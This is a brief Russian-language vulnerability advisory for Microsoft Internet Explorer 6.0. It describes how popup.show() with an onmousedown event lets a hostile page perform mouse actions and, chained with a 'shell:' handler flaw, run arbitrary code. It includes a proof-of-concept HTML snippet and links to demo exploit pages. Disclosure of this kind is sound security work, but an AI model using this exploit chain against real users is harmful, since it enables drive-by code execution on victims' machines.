Программа: Microsoft Internet Explorer 6.0
Уязвимость обнаружена в Microsoft Internet Explorer в popup.show(). Удаленный пользователь может выполнить произвольные действия мышки на целевой системе.
Удаленный пользователь может создать HMTL, который использует функцию popup.show() с 'on mousedown' событием, чтобы выполнить различные действия мышки на целевой системе пользователя.
Пример:
http://freehost07.websamba.com/greyhats/hijackclick3.htm
Эта уязвимая функция может использоваться вместе с уязвимостью в "shell://" обработчике, чтобы выполнить произвольный код на целевой системе пользователя. Пример:
<img src="greyhat.html" id=anch onmousedown="parent.nsc.style.width=2000;
parent.nsc.style.height=2000; parent.pop.show(1,1,1,1); parent.setTimeout('showalert()',3000);
" style="width=168px;height=152px; background-image:url ('youlickit.gif');cursor:hand"
title="click me!"></a> location="shell:favorites\\greyhat[1].htm"
Пример:
http://www.malware.com/paul.html
